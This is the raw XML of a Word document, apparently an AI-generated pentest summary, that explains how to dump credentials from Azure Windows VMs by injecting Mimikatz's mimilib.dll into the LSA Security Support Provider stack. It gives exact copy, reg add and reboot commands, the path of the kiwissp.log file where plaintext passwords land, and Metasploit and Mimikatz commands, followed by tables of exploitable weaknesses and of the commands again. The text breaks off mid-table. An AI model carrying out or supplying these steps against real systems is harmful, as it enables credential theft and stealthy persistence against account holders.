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C53D" w14:textId="6B046881" w:rsidR="00F41B33" w:rsidRDefault="007B4563">
      <w:r>
        <w:t>Credential dumping with security service provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20177908" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563"/>
    <w:p w14:paraId="4E42A26F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563"/>
    <w:p w14:paraId="58D5FB75" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc221397417"/>
      <w:r>
        <w:t>with Security service provider</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="241C89DA" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563" w:rsidP="007B4563"/>
    <w:p w14:paraId="75E13B92" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected and concise summary</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how to pentest Azure Windows/Linux VMs for credential dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">, focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local accounts, AD accounts (NTDS), and Microsoft Entra ID accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">, with detailed steps, commands, and exploited Azure VM vulnerabilities — specifically covering </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Support Provider (SSP) credential dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> with manual and tool-assisted methods like Mimikatz, Metasploit, and PowerShell Empire. Duplicates removed and structure clarified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB745E6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="716FDC43">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E017E1D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Pentesting Credential Dumping on Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A501E84" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Targets: Local Windows accounts, Active Directory (AD) accounts, Microsoft Entra ID (Azure AD) accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF6AB9" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="6B61DD97">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9DFA9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1. Introduction: Security Support Provider (SSP) Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A38CB0" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> is a Windows API/DLL loaded into the Local Security Authority (LSA) at system startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3258EBF8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>SSP manages Windows authentication packages (e.g., Kerberos, WDigest).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18614D22" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>By tampering with SSP registry keys and DLLs, attackers can dump plaintext credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D8C221" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Registry Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C4F59" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="247ECF63">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="649CB743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2. Manual SSP Credential Dumping Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F6C71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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15600DF6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Inject a custom DLL (mimilib.dll) into the SSP stack to dump credentials into a file (kiwissp.log) on each user login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210440DB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Detailed Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38C4A9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Copy mimilib.dll to System32 folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD5C97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t>copy .\mimikatz\mimilib.dll C:\Windows\System32\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635D47D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Check current SSP registry entry (should be empty or missing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A258BC4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t>reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F9534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Add required SSP entries including mimilib:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBBABCE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t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BAD55A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Verify the change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3897BD88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t>reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304ECA19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Reboot the system</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> — after reboot, on user login the DLL will create kiwissp.log in C:\Windows\System32\ containing plaintext credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ABE3B1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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read dumped credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AE980" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>type C:\Windows\System32\kiwissp.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEC9210" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="2FE6C13D">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC635A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3. Automated Credential Dumping Tools Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746C5121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Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A714C3B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Tool for extracting plaintext passwords, hashes, PINs, and Kerberos tickets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67866D57" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use for dumping credentials live from memory or exploiting SSP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1D90D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Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2849CFE9" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Offers post-exploitation modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9EEA5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>post/windows/gather/credentials/credentials_ssp for SSP credential dumping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204F0FB" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>Various modules for NTDS extraction, lateral movement, and hash dumping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D9A23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Koadic / PowerShell Empire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632EF918" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Post-exploitation frameworks with modules to dump credentials and manipulate SSP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16F965" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Support DLL injection and registry edits to automate credential harvesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A4BD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Powershell Empire mimilib.dll Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC6121" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Leverages custom DLL injection to dump credentials similarly to manual SSP method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675709A6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Automates persistence and dumping with PowerShell commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A1D45" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="42900472">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E18C20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4. Azure VM Vulnerabilities Exploited for SSP and Credential Dumping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6136"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="63E7B13D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979F9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05910D6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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="24EC1188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66A6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Admin or SYSTEM privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4779C0F3" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Required to modify SSP registry keys and copy DLLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="0D16D47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4D6D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Unrestricted PowerShell execution policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55CBF8DB" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Allows running scripts and modules like Mimikatz or Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="25502AD3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543E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Lack of credential guard / encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C69507" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Plaintext creds can be dumped if LSASS is accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="5C48206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AF1B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Poor monitoring of LSA registry changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6355591A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Allows stealthy persistence and dumping without detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="2DE469E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B13D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Weak VM isolation or compromised sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="596C617A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Attackers gain remote shell or Meterpreter session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EBE8713" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="2A07679A">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E50AF6E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5. Summary Table of Commands &amp;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825"/>
        <w:gridCol w:w="1480"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="1155F96A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EC65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87CBEF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 / Tool Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A78996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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="3149CCE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1AA5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Check SSP registry entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1160FC31" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50B7ABE2" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Confirm SSP config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="0989E4E1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7E8D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Add mimilib to SSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6671CFBF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v Security Packages /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="373BBB36" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Inject DLL into SSP stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="2B6543F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528D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Copy mimilib DLL to System32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48519149" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>copy mimilib.dll C:\Windows\System32\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C3F81D8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>DLL needed for credential dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="1AD23C7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18F3" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Reboot VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57400C86" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use Azure Portal, Azure CLI, or command line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2D603F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Activate SSP changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="5C41690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3498" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Read dumped credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28597300" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>type C:\Windows\System32\kiwissp.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A9DA14B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Contains plaintext creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="0EEF517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0C07" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use Mimikatz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69E83904" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Run mimikatz commands like sekurlsa::logonpasswords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CE02B71" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Live credential dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="35395096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EE2C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use Metasploit SSP module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A5EC594" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>use post/windows/gather/credentials/credentials_ssp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CEB66E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Automated dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="1EAACC9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4DED" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use PowerShell Empire mimilib module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1B6937" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
